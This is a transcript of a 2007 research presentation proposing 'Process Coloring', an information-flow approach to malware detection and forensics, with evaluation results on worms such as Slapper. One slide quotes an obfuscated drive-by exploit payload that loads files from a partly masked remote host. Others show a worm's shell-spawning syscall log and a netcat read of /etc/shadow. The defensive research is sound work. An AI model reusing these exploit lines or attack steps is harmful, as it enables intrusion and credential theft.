Presentation is loading. Please wait.

Presentation is loading. Please wait.

Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science.

Similar presentations


Presentation on theme: "Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science."— Presentation transcript:

1 Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University Xuxian Jiang Department of Information and Software Engineering George Mason University NICIAR Site Visit, West Lafayette, IN, July 19, 2007

2 Motivation  Internet malware remains a top threat  Malware: virus, worms, rootkits, spyware, bots…

3 Motivation

4  Upon Clicking a malicious URL  http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html  Result: 22 unwanted programs are installed without user’s consent! MS04-013 MS03-011 MS05-002 * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`> '); }catch(e){} Motivation

5 Our Challenge: Enabling Timely, Efficient Malware Investigation  Raising timely alert to trigger a malware investigation  Identifying the break-in point of the malware  Reconstructing all contaminations by the malware Time External detection point Infection Break-in point trace-back Contamination reconstruction Break-in point Log Detection Today’s log-based intrusion investigation tools (e.g., BackTracker, Taser) Log

6 Limitations of Today’s Tools  Long “infection-to-detection” interval  Entire log needed for both trace-back and reconstruction  Questionable trustworthiness of log data Time External detection point Infection Break-in point trace-back Contamination reconstruction Break-in point Log Detection Existing log-based intrusion investigation tools Log

7 Goals of Research  Improve malware defense capabilities of enterprise computing infrastructure:  Detection of malware activity  Identification of vulnerable programs/applications  Accountability of computation activities  Recoverability from malware contaminations  Proactive protection of sensitive information/data  Demonstrate via success metrics with respect to:  Timeliness  Efficiency  Accuracy

8 Goals of Research  Goals fit within NICECAP research themes  “Accountable information flows”  Based on information flow theory  Instantiated at operating system level  Holding malware accountable  “Large-scale system defense”  Targeting large-scale malware infection (e.g., botnets)  Enabling malware detection and remediation  Providing first line of response (applicable to legacy applications w/o source code)

9 Technical Approach: Process Coloring  Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows  Existing tools only consider direct causality relations without preserving and exploiting break-in provenance information Runtime alert triggered by log color anomalies Apache SendmailDNSMySQL Logger Guest OS Virtual Machine Monitor (VMM) Log Monitor Virtual Machine Attacker … Log

10 New Capabilities of Process Coloring  Color-based malware warning (vs. external detection point)  Color-based break-in point identification (vs. back-tracking)  Color-based log partitioning (vs. entire log) for reconstruction Time Infection Break-in point Detection Contamination reconstruction

11 Impact of Success  How will it benefit the NIC?  Accountability of NIC cyber infrastructure  Readiness against current and emerging malware threats (e.g., botnets, rootkits, spyware) to NIC  Protection of NIC critical data, information, and computation activities  Reduction of NIC human labor in malware investigation

12 Impact of Success  How will it benefit the IA Community  Systematic model for OS-level information flows  Mechanisms and policies for elevated accountability of commodity OS  Tools and methods for malware alert, investigation, and recovery  Artifacts, data, insights and lessons for further malware research

13 Sample Scenario httpd /bin/sh wget Root kit Local files Alert httpd netcat /etc/shado w Confidential Info /etc/shado w Confidential Info Question 2: How does the malware break into the system? Question 3: What does the malware do after break-in? Question 1: How is the malware detected?

14 httpd /bin/sh wget Root kit Local files httpd netcat /etc/shado w Confidential Info /etc/shado w Confidential Info “httpd” READS an incoming request “httpd” CREATES a new process “/bin/sh” “/bin/sh” CREATES a new process “netcat” “netcat” READS “/etc/shadow” file “/bin/sh” MODIFIES local files “/bin/sh” CREATES a new process “wget” “wget” CREATES local file(s) - “Root kit” Existing Approach Log 1. Online log collection Alert External detection point

15 1. Online log collection httpd /bin/sh wget Root kit Alert Backward Tracking Existing Approach Log 2. Offline backward tracking “wget” CREATES local file(s) - “Root kit” “httpd” CREATES a new process “/bin/sh” “/bin/sh” CREATES a new process “wget” Break-in Point ! [King+, SOSP’03] External detection point

16 1. Online log collection httpd /bin/sh wget Root kit Local files Alert netcat /etc/shado w Confidential Info /etc/shado w Confidential Info Existing Approach Log 2. Offline backward tracking 3. Offline forward tracking Forward Tracking “httpd” CREATES a new process “/bin/sh” “/bin/sh” CREATES a new process “netcat” “netcat” READS “/etc/shadow” file “/bin/sh” CREATES a new process “wget” “wget” CREATES local file(s) - “Root kit” Break-in Point ! “/bin/sh” MODIFIES local files External detection point

17 httpd Process Coloring Approach s80httpdrcinit s45named s30sendmail s55sshd s80httpd s30sendmail s45named s55sshd /bin/sh wget Root kit Local files netcat /etc/shado w Confidential Info /etc/shado w Confidential Info 1. Initial coloring 2. Coloring diffusion Log Capability 3: Color-based log partition for contamination analysis Capability 2: Color-based identification of break-in point Capability 1: Color-based malware warning

18 ... BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5 BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800 BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25 BLUE: 673["sendmail"]: 6_close(5) = 0 BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0... RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5 RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11 RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40 RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090 … RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21 RED: 2568["httpd"]: 63_dup2(5, 2) = 2 RED: 2568["httpd"]: 63_dup2(5, 1) = 1 RED: 2568["httpd"]: 63_dup2(5, 0) = 0 RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000) RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2 RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6 Timeliness by Process Coloring: Color-Based Malware Warning Capability 1: Color-based malware warning: “unusual color inheritance”

19 Timeliness by Process Coloring Color-Based Malware Warning  Another example: “ color mixing ” RED: 1234 ["httpd"]: … RED+BLUE: 1234 ["httpd"]: system call to read file index.html cp defaced.html index.html bind httpd index.html httpd

20 Efficiency by Process Coloring LionSlapperSARS Time period being analyzed 24 hours # worm- related entries 66,504195,88419,494 Exploited Service BIND (CVE-2001-0010) Apache (CAN-2002-0656) Samba (CAN-2003-0085) % of Log Inspected 48.7%65.9%12.1% Capability 2: Color-based break-in point identification Capability 2: Color-based break-in point identification Capability 3: Color-based log partitioning Capability 3: Color-based log partitioning

21 Accuracy by Process Coloring  Accuracy of color-based malware warning  False positives and false negatives  Accuracy of malware contamination reconstruction  Sufficiency of log partition (“no useful log entries left out”)  Compare malware action graphs with published malware analysis report  Limitation of causality-based reconstruction algorithms (e.g., BackTracker, Taser)

22 Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example inet_sock(80) 2568: httpd 2568(execve): /bin//sh 2568(execve): /bin/bash -i 2586: /bin/rm –rf /tmp/.bugtraq.c 2587: /bin/cat /tmp/.uubugtraq/tmp/.bugtraq.c fd 5 recv execve fork, execve open, dup2, writeunlink accept dup2, read

23 Research Task I: Color Diffusion Model (Month 1-6)  Color Diffusion Model  OS-level Information Flows OperationDiffusion syscalls CREATE create color(o 1 ) = color(s 1 ) color(s 2 ) = color(s 1 ) create, mkdir, link fork, vfork, clone READ read color(s 1 ) = color(s 1 ) υ color(o 1 ) color(s 1 ) = color(s 1 ) υ color(s 2 ) read, readv, recv ptrace WRITE write color(o 1 ) = color(s 1 ) υ color(o 1 ) color(s 2 ) = color(s 1 ) υ color(s 2 ) write, writev, send Ptrace, wait, signal DESTROY destroy unlink, rmdir, close exit, kill

24 Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18)  Server-side malware investigation  Consolidated server environment with independent server applications  “Clustered” information flows partitioned by server applications  Color mixing highly unlikely between applications  Client-side malware investigation  Inter-dependent client applications (e.g., text editor  compiler; latex  dvips  ps2pdf)  More inter-application information flows  Legal color mixing exists

25  A motivating example of client-side process coloring Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18) FTP Quick Tax Time Quick Tax FTP +

26 Research Task III: Color Mixing Handling via Information Flow Control (Month 7-18)  Profiling legal color mixing inside a client host  Shared files  Helper processes  Approach 1: information flow insulation  Approach 2: information flow border control P1 Shared file P2 Shared file P1 Shared File P2 Insulated

27 Related Work Based on Information Flows  Instruction level information flows  Lacking system-wide semantic information (e.g., info. about processes and files)  Language level information flows  Focusing on information flows inside a program  Operating system level information flows  Complementing the above categories  Revealing system-wide semantic information  Benefiting detection, recovery, and forensics as first line of defense

28 Metrics: Definitions  Timeliness  Malware infection-to-warning interval  Efficiency  Percentage of log reduction for malware contamination reconstruction  Accuracy  False positive rate of malware warning  False negative rate of malware warning  Correctness of malware action graphs

29 Metrics: Evaluation Plan  Sources of malware  Repository of malware (worms, botware, rootkits)  Malware captured by honeypots and honeyfarm  Target computing environments  Consolidated servers  Clients  Experiment environments  VM-based honeyfarm (Collapsar)  VM-based malware playground (vGround)  Methodology: Evaluate by comparison  With process coloring  Without process coloring

30 Project Organization and Management  Purdue Team  Faculty  Eugene Spafford  Dongyan Xu  Graduate students  Ryan Riley  Larissa O’Brien  TBD  Budget  $xxx,xxx  George Mason Team  Faculty  Xuxian Jiang  Graduate student  TBD  Budget  $xxx,xxx

31 Project Organization and Management 123456789101112131415161718 Experiments June 7 th, 2007 Software Deliverable 1. Task I (Section 3.1) 2. Task II (Section 3.2) 3. Task III (Section 3.3) 4. Meetings and Document Prep 5. Prototype Instantiation Tasks - 2.1 Subtask II.1 - 2.2 Subtask II.2 2.3 Subtask II.3. 3.1 Subtask III.1 3.2 Subtask III.2 3.3 Subtask III.3 Quarterly Program ReviewsSite Visit Software Demonstrations #1#2#3 Basic Xen-based prototype Tools for malware investigation Mechanisms for color mixing control

32 Project Organization and Management Spending during Summer’07: Purdue: One month graduate student support (half-time) GMU: One month summer salary (planned) Spending during Summer’07: Purdue: One month graduate student support (half-time) GMU: One month summer salary (planned)

33 Recent Progress We are here Identifying color diffusion operations in Linux OS Starting to implement log coloring and collection on Xen VMM

34 Projected Progress in the Next 3-6 Months 11/21/07: A comprehensive color diffusion model under Linux 12/07/07: Demo and software release of basic Xen-based prototype

35 Technology Transfer Plan  Potential adopters  Computer forensics/malware investigators and researchers  System administrators  Anti-malware software companies  Open source communities (e.g., XenSource)  Software release and documentation  Presentations and demos to potential NIC adopters  Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)

36 Thank you! For more information about the Process Coloring project: http://cairo.cs.purdue.edu/projects/pc PC@cs.purdue.edu


Download ppt "Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science."

Similar presentations


Ads by Google